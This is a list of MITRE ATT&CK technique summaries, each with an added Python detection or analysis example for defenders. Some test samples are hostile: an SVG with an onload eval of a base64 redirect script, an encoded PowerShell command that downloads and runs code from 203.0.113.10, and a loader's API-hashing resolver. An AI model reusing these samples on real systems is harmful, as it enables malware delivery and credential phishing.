[T1036 ] Masquerading – Adversaries alter file names, locations, metadata, or service/task identifiers so that malicious artifacts look legitimate and evade detection, often with subtle tricks such as right-to-left Unicode override characters, double extensions, homoglyph names, or trusted binary names placed in untrusted directories to fool both users and tools. #Masquerading #DefenseEvasion
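The checks a practitioner would run over a file path to catch those tricks, as an added example that is not part of the page or of ATT&CK: a right-to-left override (U+202E) or other bidi control in the name, a document extension followed by an executable one, whitespace padding that pushes the real suffix out of view, non-ASCII look-alike letters, and a well-known system binary name outside its expected directory. The extension lists and the expected-location table are assumptions for illustration; a real deployment would load them from inventory.

```python
"""Flag file names and paths that use common masquerading tricks (added example)."""
import re
import unicodedata

# Unicode bidirectional overrides/embeddings that visually reorder a file name.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
# Assumed lists; extend from your own telemetry.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js",
                   ".vbs", ".ps1", ".hta", ".lnk", ".msi"}
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png", ".zip"}
# Assumed legitimate directories for a few well-known Windows binaries (lowercase).
EXPECTED_LOCATIONS = {
    "svchost.exe": {"c:\\windows\\system32", "c:\\windows\\syswow64"},
    "lsass.exe": {"c:\\windows\\system32"},
    "explorer.exe": {"c:\\windows"},
}


def findings_for(path: str) -> list[str]:
    """Return the masquerading indicators found in one full path (empty list = clean)."""
    out = []
    directory, _, name = path.replace("/", "\\").rpartition("\\")

    # 1. Bidi override: the rendered name differs from the stored one.
    if any(ch in BIDI_CONTROLS for ch in name):
        out.append("bidi-override")

    # Strip the controls before looking at extensions so the true suffix is examined.
    clean = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    lower = clean.lower()

    # 2. Double extension: a document-looking name whose real suffix executes.
    m = re.search(r"(\.[a-z0-9]{1,5})\s*(\.[a-z0-9]{1,4})$", lower)
    if m and m.group(1) in DOCUMENT_EXTS and m.group(2) in EXECUTABLE_EXTS:
        out.append("double-extension")

    # 3. Whitespace padding that pushes the real extension out of a truncated column.
    if re.search(r"\s{3,}\.[a-z0-9]{1,4}$", lower):
        out.append("whitespace-padded-extension")

    # 4. Homoglyphs: non-ASCII letters (e.g. Cyrillic o) standing in for ASCII ones.
    if any(ord(ch) > 127 and unicodedata.category(ch).startswith("L") for ch in clean):
        out.append("non-ascii-letters")

    # 5. Known system binary name in a directory where it never legitimately lives.
    expected = EXPECTED_LOCATIONS.get(lower)
    if expected and directory.lower() not in expected:
        out.append("unexpected-location")
    return out


if __name__ == "__main__":
    # Constructed sample paths; the RLO name displays as "report" + "exe.pdf".
    for p in ["C:\\Windows\\System32\\svchost.exe",
              "C:\\Users\\Public\\svchost.exe",
              "C:\\Users\\bob\\Downloads\\report\u202efdp.exe",
              "C:\\Users\\bob\\Downloads\\invoice.pdf.exe",
              "C:\\Users\\bob\\Downloads\\photo.jpg                          .scr"]:
        print(repr(p), "->", findings_for(p) or "clean")
```

The bidi check runs on the stored name, but the extension checks run on the name with the controls removed, because the point of U+202E is that the displayed suffix is not the real one.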
Category: MITRE
[T1033 ] System Owner/User Discovery – Adversaries probe systems to identify who owns or is using a device to guide next steps, such as privilege escalation or targeted lateral movement. Knowing active users helps attackers choose tailored actions and avoid noisy behavior. #SystemOwnerDiscovery #UserDiscovery
[T1030 ] Data Transfer Size Limits – Attackers may split stolen data into many small, fixed-size chunks or limit packet sizes to slip under network transfer thresholds and alerts. Monitoring for unusual asymmetric flows, regular small-packet patterns, and new network-using processes helps spot this exfiltration method. #DataExfiltration #NetworkSecurity
[T1029 ] Scheduled Transfer – Scheduled transfer is when attackers time data exfiltration to occur at predictable times or intervals to blend with normal activity and avoid detection. It often pairs with other exfiltration methods like C2 channels or alternative protocols to move data out stealthily. #ScheduledTransfer #DataExfiltration
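Both entries above (T1030 size limits and T1029 scheduled transfer) come down to the same three flow traits: outbound sizes that repeat, inter-flow gaps that repeat, and traffic that is upload-heavy. The following is an added example, not code from the page or from ATT&CK, that scores (process, destination) pairs on those traits over constructed flow records; the thresholds (80% size uniformity, gap coefficient of variation at or below 0.1, at least 5:1 out/in ratio) are assumptions to tune against your own baseline.

```python
"""Spot chunked (T1030) and scheduled (T1029) exfiltration in flow records (added example)."""
from collections import Counter, defaultdict
from statistics import mean, pstdev

# Constructed flow records: (epoch seconds, process, destination, bytes out, bytes in).
FLOWS = [
    # Ordinary browsing: irregular timing, varied sizes, far more inbound than outbound.
    (1000, "chrome.exe", "93.184.216.34:443", 1800, 45000),
    (1037, "chrome.exe", "93.184.216.34:443", 2100, 120000),
    (1112, "chrome.exe", "93.184.216.34:443", 900, 8000),
    (1300, "chrome.exe", "93.184.216.34:443", 4100, 310000),
    (1410, "chrome.exe", "93.184.216.34:443", 1500, 22000),
] + [
    # Suspect: a 512 KiB chunk every 600 s from an unfamiliar helper binary.
    (2000 + 600 * i, "updater.exe", "203.0.113.10:443", 524288, 300) for i in range(8)
]


def profile(flows, min_flows=5):
    """Group flows by (process, destination) and score each group on the three traits."""
    groups = defaultdict(list)
    for ts, proc, dst, out_b, in_b in flows:
        groups[(proc, dst)].append((ts, out_b, in_b))
    report = {}
    for key, rows in groups.items():
        if len(rows) < min_flows:          # too few samples to say anything about regularity
            continue
        rows.sort()
        sizes = [o for _, o, _ in rows]
        gaps = [b[0] - a[0] for a, b in zip(rows, rows[1:])]
        # Share of flows carrying the most common outbound size (1.0 = perfectly chunked).
        size_uniformity = Counter(sizes).most_common(1)[0][1] / len(sizes)
        # Coefficient of variation of the inter-flow gaps (0.0 = perfectly periodic).
        gap_cv = pstdev(gaps) / mean(gaps) if mean(gaps) else 0.0
        # Outbound-to-inbound byte ratio; exfiltration is upload-heavy.
        asymmetry = sum(sizes) / max(1, sum(i for _, _, i in rows))
        report[key] = {
            "flows": len(rows),
            "size_uniformity": round(size_uniformity, 2),
            "gap_cv": round(gap_cv, 2),
            "asymmetry": round(asymmetry, 1),
            "flag": size_uniformity >= 0.8 and gap_cv <= 0.1 and asymmetry >= 5,
        }
    return report


def flagged(flows):
    """Return the (process, destination) pairs that trip all three thresholds."""
    return sorted(k for k, v in profile(flows).items() if v["flag"])


if __name__ == "__main__":
    for key, score in profile(FLOWS).items():
        print(key, score)
    print("flagged:", flagged(FLOWS))
```

Requiring all three traits at once keeps legitimate periodic jobs (backups, telemetry agents) from alerting on timing alone; in practice you would whitelist known agents by signer or hash and lower the flow-count floor for long-lived sessions.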
[T1027.017 ] Obfuscated Files or Information: SVG Smuggling – SVG smuggling hides malicious JavaScript or payloads inside seemingly harmless SVG image files to bypass content filters and fool users, enabling delivery of malware, credential theft, or redirects to malicious sites. #SVGSmuggling #DefenseEvasion
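A static triage pass over SVG content, as an added example not taken from the page or from ATT&CK: it parses the XML and reports the carriers SVG smuggling relies on, namely script elements, event-handler attributes, javascript: and base64 data: hrefs, foreignObject (which lets HTML ride inside the image), and base64 blobs in text nodes that decode to markup. The two sample files and the 40-character blob threshold are constructed for the example.

```python
"""Static triage of SVG files for smuggling indicators (added example)."""
import base64
import re
import xml.etree.ElementTree as ET


def _local(qualified: str) -> str:
    """Strip a namespace, e.g. {http://www.w3.org/2000/svg}script -> script."""
    return qualified.rsplit("}", 1)[-1].lower()


def scan_svg(data: bytes) -> list[str]:
    """Return sorted indicator names; an empty list means nothing suspicious was found."""
    hits = set()
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["unparseable"]           # malformed files deserve a look of their own
    for el in root.iter():
        tag = _local(el.tag) if isinstance(el.tag, str) else ""
        if tag == "script":
            hits.add("script-element")
        if tag == "foreignobject":
            hits.add("foreignObject")
        for attr, value in el.attrib.items():
            name = _local(attr)          # covers both href and xlink:href
            v = value.strip().lower()
            if name.startswith("on"):
                hits.add(f"event-handler:{name}")
            if name == "href":
                if v.startswith("javascript:"):
                    hits.add("javascript-uri")
                elif v.startswith("data:") and "base64," in v:
                    hits.add("base64-data-uri")
                elif tag == "a" and v.startswith(("http://", "https://")):
                    hits.add("external-link")
    # Base64 blobs in text/CDATA that decode to markup: a second-stage payload carrier.
    for text in root.itertext():
        for blob in re.findall(r"[A-Za-z0-9+/]{40,}={0,2}", text):
            try:
                decoded = base64.b64decode(blob, validate=True).lower()
            except ValueError:
                continue
            if b"<script" in decoded or b"<html" in decoded or b"<iframe" in decoded:
                hits.add("base64-encoded-markup")
    return sorted(hits)


# Constructed samples (not real lures).
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="steelblue"/>
</svg>"""

_PAYLOAD = base64.b64encode(b"<script>location='http://203.0.113.10/login'</script>").decode()
SMUGGLED_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <rect width="10" height="10" onload="eval(atob(document.getElementById('p').textContent))"/>
  <a xlink:href="javascript:void(0)"><text x="1" y="5">open</text></a>
  <script id="p"><![CDATA[{_PAYLOAD}]]></script>
</svg>""".encode()

if __name__ == "__main__":
    print("benign:", scan_svg(BENIGN_SVG))
    print("smuggled:", scan_svg(SMUGGLED_SVG))
```

Mail and web gateways that treat `image/svg+xml` as an image rather than as active content miss every one of these; the cheap mitigation is to strip or block inline SVG at the boundary and serve user-uploaded SVG only with a restrictive Content-Security-Policy.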
[T1027.016 ] Obfuscated Files or Information: Junk Code Insertion – Junk or dead code is added to malware to hide real functionality and slow analysis, often combined with packing or compression to evade static detection. #JunkCodeInsertion #DefenseEvasion
[T1027.015 ] Obfuscated Files or Information: Compression – Adversaries compress and archive payloads (ZIP, gzip, 7z, RAR, self-extracting archives) or compress shellcode to hide malicious content and ease transfer. Attackers may concatenate archives or password-protect/encrypt compressed files to evade scanners and trick users into extracting and executing malware. #Compression #DefenseEvasion
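Two of the tricks above, concatenated archives and password-protected entries, are visible in the ZIP structure without extracting anything. The following added example (not code from the page or from ATT&CK) builds archives in memory with the standard library, counts end-of-central-directory records, reads the per-entry encryption flag, and shows that a standard reader only lists the archive whose central directory comes last. The risky-extension list is an assumption.

```python
"""Inspect a ZIP blob for concatenation, encrypted entries and executable content (added example)."""
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # end of central directory record
CDH_SIG = b"PK\x01\x02"    # central directory file header
LFH_SIG = b"PK\x03\x04"    # local file header
RISKY_EXTS = (".exe", ".scr", ".js", ".vbs", ".lnk", ".hta", ".bat", ".cmd", ".ps1")


def inspect_zip(blob: bytes) -> dict:
    """Return structural findings for one archive without extracting anything."""
    findings = {
        "concatenated": blob.count(EOCD_SIG) > 1,   # more than one archive glued together
        "encrypted_entries": [],
        "risky_entries": [],
        "trailing_bytes": 0,
    }
    last = blob.rfind(EOCD_SIG)
    if last != -1:
        comment_len = struct.unpack_from("<H", blob, last + 20)[0]
        findings["trailing_bytes"] = len(blob) - (last + 22 + comment_len)
    # zipfile locates the LAST EOCD, so a concatenated archive's first half is invisible here.
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for info in zf.infolist():
                if info.flag_bits & 0x1:             # general-purpose bit 0: entry is encrypted
                    findings["encrypted_entries"].append(info.filename)
                if info.filename.lower().endswith(RISKY_EXTS):
                    findings["risky_entries"].append(info.filename)
    except zipfile.BadZipFile:
        findings["bad_zip"] = True
    return findings


def build_zip(entries: dict[str, bytes], mark_encrypted: bool = False) -> bytes:
    """Construct a test archive in memory; optionally set the encryption bit on every header."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    blob = bytearray(buf.getvalue())
    if mark_encrypted:
        # Flags sit at +6 in local headers and +8 in central headers.
        for sig, off in ((LFH_SIG, 6), (CDH_SIG, 8)):
            pos = blob.find(sig)
            while pos != -1:
                flags = struct.unpack_from("<H", blob, pos + off)[0] | 0x1
                struct.pack_into("<H", blob, pos + off, flags)
                pos = blob.find(sig, pos + 4)
    return bytes(blob)


if __name__ == "__main__":
    benign = build_zip({"readme.txt": b"hello"})
    locked = build_zip({"invoice.pdf.exe": b"MZ-placeholder"}, mark_encrypted=True)
    glued = build_zip({"payload.js": b"alert(1)"}) + benign
    for label, blob in (("benign", benign), ("locked", locked), ("glued", glued)):
        print(label, inspect_zip(blob))
```

The glued case is the one scanners get wrong: this reader, and most AV engines, see only `readme.txt`, while extractors that start from the first local header see `payload.js`. Treat more than one EOCD record, or non-zero trailing bytes, as a reason to quarantine rather than to trust the listing.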
[T1027.014 ] Obfuscated Files or Information: Polymorphic Code – Polymorphic code mutates its form each time it is executed or propagated to defeat signature-based detection; the technique is used on Windows, Linux, and macOS and changes file content, metadata, or runtime behavior while preserving function. Detection relies on behavior-based telemetry, file and application logs, and endpoint monitoring to spot anomalies in file-creation patterns, execution profiles, and mutation-engine activity. #PolymorphicCode #DefenseEvasion
[T1027.013 ] Obfuscated Files or Information: Encrypted/Encoded File – Adversaries encrypt or encode files to hide malicious content from signature and pattern-based defenses, often using layered encodings, password-protected archives, or custom schemes to delay discovery until execution. #ObfuscatedFiles #DefenseEvasion
[T1027.012 ] Obfuscated Files or Information: LNK Icon Smuggling – LNK Icon Smuggling hides a download command or external URL in the icon location metadata field of a Windows shortcut (.LNK) file, so a content filter sees a harmless shortcut while opening it fetches the malicious payload. The technique appears in phishing lures and in post-compromise staging to bring down additional malware without an obvious executable on disk. #LNKIconSmuggling #DefenseEvasion
[T1027.011 ] Obfuscated Files or Information: Fileless Storage – Adversaries hide code and stolen data in non-file locations like the Windows Registry, WMI repository, event logs, or Linux shared memory to evade disk-based defenses and persist covertly. Monitor volatile stores and central OS repositories to detect hidden artifacts and abnormal usage patterns. #FilelessStorage #DefenseEvasion
[T1027.010 ] Obfuscated Files or Information: Command Obfuscation – Command obfuscation hides malicious intent in CLI and script strings to evade detection and forensic analysis. Watch for unusual encodings, escape characters, string concatenation, and directory-traversal tricks that preserve functionality while defeating signatures. #CommandObfuscation #DefenseEvasion
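The layered encodings in T1027.013 and the command-string tricks in T1027.010 above are usually peeled the same way: apply whatever transform matches, then repeat until the text stops changing. The following added example (not code from the page or from ATT&CK) does that for four common PowerShell layers: `-EncodedCommand` (base64 of UTF-16LE), `[Convert]::FromBase64String` with an optional gzip inside, backtick escapes that split keywords, and `('a'+'b')` concatenation. The nested sample is constructed by the block itself; the set of layers handled is an assumption, and a real tool needs many more.

```python
"""Peel common encoding/obfuscation layers off a PowerShell command line (added example)."""
import base64
import binascii
import gzip
import re


def peel_once(cmd: str):
    """Apply the first matching transform; return (layer_name, new_text) or None if stable."""
    s = cmd.strip()
    # 1. -EncodedCommand / -enc / -e <base64 of UTF-16LE script>
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", s, re.I)
    if m:
        try:
            return "powershell-encodedcommand", base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            pass
    # 2. [Convert]::FromBase64String('...'): extract the embedded payload, gunzip if needed.
    m = re.search(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", s, re.I)
    if m:
        raw = base64.b64decode(m.group(1))
        if raw[:2] == b"\x1f\x8b":
            return "base64+gzip", gzip.decompress(raw).decode("utf-8", "replace")
        return "base64", raw.decode("utf-8", "replace")
    # 3. Backtick before a non-escape character is a no-op PowerShell uses to break keywords.
    if re.search(r"`[^0abefnrtv`\"'$]", s):
        return "backtick-escape", re.sub(r"`([^0abefnrtv`\"'$])", r"\1", s)
    # 4. ('Inv'+'oke-Ex'+'pression') -> 'Invoke-Expression'
    m = re.search(r"\(\s*('[^']*'(?:\s*\+\s*'[^']*')+)\s*\)", s)
    if m:
        joined = "".join(re.findall(r"'([^']*)'", m.group(1)))
        return "string-concat", s.replace(m.group(0), "'" + joined + "'")
    return None


def deobfuscate(cmd: str, max_layers: int = 10):
    """Peel layers until the text is stable; return (final_text, [layer names in order])."""
    layers, cur = [], cmd
    for _ in range(max_layers):
        step = peel_once(cur)
        if step is None:
            break
        name, cur = step
        layers.append(name)
    return cur, layers


def build_sample() -> str:
    """Constructed four-layer sample, nested the way droppers nest them (not a real command)."""
    inner = ("Inv`oke-Ex`pression (New-Object ('Net.'+'Web'+'Client'))"
             ".DownloadString('http://203.0.113.10/s')")
    gz = base64.b64encode(gzip.compress(inner.encode(), mtime=0)).decode()
    middle = ("$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + gz + "'));"
              "iex (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
              "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()")
    enc = base64.b64encode(middle.encode("utf-16-le")).decode()
    return "powershell.exe -nop -w hidden -enc " + enc


if __name__ == "__main__":
    final, layers = deobfuscate(build_sample())
    print(layers)
    print(final)
```

Step 2 deliberately returns only the embedded payload and drops the decoder wrapper around it; that is the analyst's usual first move, but it does lose context, so keep the intermediate strings for the report. Note that backticks inside single-quoted strings are literal in PowerShell, which is why the sample puts them in the bare command name.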
[T1027.009 ] Obfuscated Files or Information: Embedded Payloads – Adversaries hide malicious modules inside otherwise benign files to evade detection, enabling stealthy execution and persistence. Protect systems by monitoring file changes, validating signatures, and inspecting uncommon file overlays. #EmbeddedPayloads #DefenseEvasion
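One concrete form of the "uncommon file overlay" check mentioned above: anything after the end of the last PE section is an overlay, and an overlay that the Authenticode security directory does not account for is where embedded payloads usually sit. The following is an added example, not code from the page or from ATT&CK; it builds a minimal PE32 image in memory for the test (an assumption, not a real binary) and parses only the headers it needs.

```python
"""Find data appended after the last PE section (an overlay) and size the part no signature explains (added example)."""
import struct


def build_pe(section_data: bytes, overlay: bytes = b"", claim_signature: bool = False) -> bytes:
    """Construct a minimal PE32 image for testing (constructed; not loadable, headers only)."""
    e_lfanew, size_opt, raw_ptr = 0x40, 0xE0, 0x200
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, size_opt, 0x102)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    if claim_signature:                                   # Security directory (index 4) covers the overlay
        struct.pack_into("<II", opt, 128, raw_ptr + len(section_data), len(overlay))
    # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, relocs, linenums, counts, Characteristics
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
                       len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    head = dos + coff + bytes(opt) + sect
    return head + b"\x00" * (raw_ptr - len(head)) + section_data + overlay


def overlay_info(pe: bytes) -> dict:
    """Return overlay offset/size/magic and how many overlay bytes the Authenticode directory does not explain."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    nsect = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt_start = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt_start)[0]
    # IMAGE_DIRECTORY_ENTRY_SECURITY holds a file offset, not an RVA; PE32 vs PE32+ differ in layout.
    dir_off = opt_start + (128 if magic == 0x10B else 144)
    sec_off, sec_size = struct.unpack_from("<II", pe, dir_off)
    end = 0
    for i in range(nsect):
        size_raw, ptr_raw = struct.unpack_from("<II", pe, opt_start + size_opt + 40 * i + 16)
        end = max(end, ptr_raw + size_raw)
    overlay = pe[end:]
    explained = sec_size if (sec_off == end and sec_size <= len(overlay)) else 0
    return {
        "overlay_offset": end,
        "overlay_size": len(overlay),
        "magic": overlay[:4],
        "unexplained_bytes": len(overlay) - explained,
    }


if __name__ == "__main__":
    stub = b"\x90" * 32
    print("clean   :", overlay_info(build_pe(stub)))
    print("embedded:", overlay_info(build_pe(stub, b"PK\x03\x04" + b"A" * 100)))
    print("signed  :", overlay_info(build_pe(stub, b"\x00" * 104, claim_signature=True)))
```

A signed binary legitimately has an overlay (the WIN_CERTIFICATE blob), so size alone is a poor signal; the comparison against the security directory is what separates a certificate table from a ZIP, a second PE, or an encrypted blob appended by a dropper. Self-extracting installers also carry large overlays by design, so pair this with a signer allow-list.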
[T1027.008 ] Obfuscated Files or Information: Stripped Payloads – Adversaries remove human-readable symbols and strings from binaries and scripts to hinder analysis and evade detection. Stripped payloads reduce useful metadata and make automated scanning and manual reverse engineering harder. #StrippedBinaries #DefenseEvasion
[T1027.007 ] Obfuscated Files or Information: Dynamic API Resolution – Dynamic API resolution hides which OS functions malware will call until runtime, defeating static inspection and altering file signatures to evade detection. Monitor module loads, suspicious GetProcAddress/LoadLibrary patterns, and unusual string-hash usage to spot this behavior. #DynamicAPIResolution #DefenseEvasion
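The "string-hash usage" mentioned above is the core of the technique: instead of importing `VirtualAlloc` by name, a loader walks a DLL's export table, hashes each name, and compares against a 32-bit constant baked into the code. The following added example (not code from the page or from ATT&CK) shows both sides in one place: the loader's hash-and-compare resolver, and the analyst's reverse lookup that turns constants pulled from a sample back into API names. The exact recipe varies by family (whether the module name is folded in, upper-casing, inclusion of the NUL terminator); this block hashes the bare ASCII name plus NUL with ROR13, which is an assumption, and the export list is a constructed slice of kernel32.

```python
"""ROR13 API hashing as used by position-independent loaders, and the reverse lookup (added example)."""

MASK = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`."""
    return ((value >> bits) | (value << (32 - bits))) & MASK


def api_hash(name: str, rotate: int = 13) -> int:
    """h = ror(h, rotate) + byte over the ASCII export name and its NUL terminator (assumed recipe)."""
    h = 0
    for b in name.encode("ascii") + b"\x00":
        h = (ror32(h, rotate) + b) & MASK
    return h


# Constructed export table: a small slice of what a loader would walk in kernel32's EAT.
KERNEL32_EXPORTS = [
    "CreateFileA", "CreateProcessA", "ExitProcess", "GetProcAddress", "LoadLibraryA",
    "VirtualAlloc", "VirtualProtect", "WinExec", "WriteProcessMemory", "CreateRemoteThread",
]


def resolve(export_names, wanted_hash: int, rotate: int = 13):
    """Loader side: GetProcAddress without the string, matching hashes while walking the export table."""
    for name in export_names:
        if api_hash(name, rotate) == wanted_hash:
            return name
    return None


def reverse_hashes(hash_constants, export_names, rotates=(13, 7, 5)):
    """Analyst side: map opaque constants from a sample back to API names, trying common rotation counts."""
    table = {(api_hash(n, r), r): n for r in rotates for n in export_names}
    out = {}
    for h in hash_constants:
        for r in rotates:
            if (h, r) in table:
                out[h] = (table[(h, r)], r)
                break
        else:
            out[h] = None
    return out


if __name__ == "__main__":
    # Constants a loader would embed instead of the strings "VirtualAlloc" / "WinExec".
    wanted = [api_hash("VirtualAlloc"), api_hash("WinExec", 7), 0xDEADBEEF]
    print({hex(h): v for h, v in reverse_hashes(wanted, KERNEL32_EXPORTS).items()})
    print("loader resolves", hex(wanted[0]), "->", resolve(KERNEL32_EXPORTS, wanted[0]))
```

Because the names never appear in the binary, static string scans see nothing; the detection opportunities are the export-table walk itself (reads of the PEB loader list and of `IMAGE_EXPORT_DIRECTORY` from non-module memory) and the tell-tale ror/add loop, which is why tools keep precomputed hash tables for the common rotation counts.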